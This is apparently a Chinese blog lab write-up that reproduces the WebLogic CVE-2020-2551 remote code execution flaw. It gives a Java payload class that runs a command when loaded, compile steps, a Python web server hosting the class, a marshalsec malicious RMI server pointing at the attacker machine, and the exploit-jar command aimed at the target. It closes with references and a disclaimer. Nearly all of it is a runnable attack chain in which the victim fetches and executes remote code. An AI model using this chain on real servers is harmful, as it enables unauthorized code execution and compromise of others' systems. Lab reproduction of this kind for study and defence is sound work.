漏洞原理
http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
https://www.cnblogs.com/-qing-/p/12682804.html
https://www.cnblogs.com/renhaoblog/p/13346294.html
环境搭建
靶机:win7 ip地址:192.168.177.129 WebLogic Server 版本: 10.3.6.0
攻击机:win10 物理机 ip地址:192.168.177.1
漏洞复现
工具使用
先使用python脚本检测漏洞:
exp文件:
1.查看exp源代码:
import java.io.IOException; public class exp { static{ try { java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"}); } catch (IOException e) { e.printStackTrace(); } } public static void main(String[] args) { } }
2.编译exp生成class
进入文件所在目录打开cmd,使用命令:javac exp.java -source 1.6 -target 1.6
3. 使用python启动web服务
进入exp目录打开cmd,使用命令启动web服务:python3 -m http.server 80
4.启动恶意RMI服务
进入目录打开cmd,开启服务命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.177.1/#exp" 1099
5.使用exp攻击
使用命令加载exp攻击靶机漏洞:java -jar weblogic_CVE_2020_2551.jar 192.168.177.129 7001 rmi://192.168.177.1:1099/exp
参考链接
https://www.cnblogs.com/loong-hon/p/10619616.html
https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/
http://blog.topsec.com.cn/weblogic-cve-2020-2551%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
https://www.cnblogs.com/-qing-/p/12682804.html
https://www.cnblogs.com/renhaoblog/p/13346294.html
免责声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !